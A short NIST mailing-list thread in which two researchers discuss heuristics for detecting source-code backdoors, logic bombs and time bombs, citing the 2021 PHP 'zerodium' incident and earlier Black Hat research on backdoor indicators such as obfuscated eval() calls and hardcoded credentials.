tool to look for backdoors (and logic bombs, time bombs, hardcoded passwords, etc.)

26 views

Skip to first unread message

Black, Paul E. (Fed)

unread,

Jun 11, 2021, 1:34:32 PM6/11/21

to samate-discuss

Are there tools that look for backdoors in code? A backdoor is like two months ago someone added code to PHP (the language!) that if a header begins with "zerodium", the remainder is accepted as arbitrary code. See
https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server/
https://www.zdnet.com/article/official-php-git-server-targeted-in-attempt-to-bury-malware-in-code-base/

Clearly, a full solution is equivalent to the halting problem. But heuristics seem feasible:
* search for comparison with hard coded strings (except as format arguments)
To deal with basic obfuscation, search for comparison with large constants, which may be the hash of the magic string.
Run once on the baseline version, carefully checking all flagged occurrences. Thereafter only check new occurrences.

A similar heuristic search should be able to find some logic bombs (bad behavior in certain conditions) or time bombs (bad behavior on certain dates or times).

A quick web search returned some hits, so I think people are trying to do this.

-paul-
Paul E. Black 100 Bureau Drive, Stop 8970
paul....@nist.gov Gaithersburg, Maryland 20899-8970
voice: +1 301 975-4794 fax: +1 301 975-6097
http://hissa.nist.gov/~black/

Chris Wysopal

unread,

Jun 11, 2021, 2:27:30 PM6/11/21

to Black, Paul E. (Fed), samate-discuss

Hi Paul,

Chris Eng and I wrote a paper on detecting backdoor based on research into known backdoors. We presented it at black hat in 2007. Much of our detection relied on backdoor indicators that are hints of backdoors. Obfuscation is one often seen. An example is a string is base64 decoded and then send to eval(). Some backdoors look like vulnerabilities. A hidden parameter in a web request is sent to eval(). Other indicator is hardcoded credentials.

Presentation slides: https://www.blackhat.com/presentations/bh-usa-07/Wysopal_and_Eng/Presentation/bh-usa-07-wysopal_and_eng.pdf

Paper: https://www.blackhat.com/presentations/bh-dc-08/Wysopal-Eng/Whitepaper/bh-dc-08-wysopal-eng-WP.pdf

A few years later I updated the work with Tyler Shields for an article in the DuD journal. Attached.

Best,

Chris

--
To unsubscribe from this group, send email to samate-discus...@list.nist.gov
View this message at https://list.nist.gov/samate-discuss
---
To unsubscribe from this group and stop receiving emails from it, send an email to samate-discus...@list.nist.gov.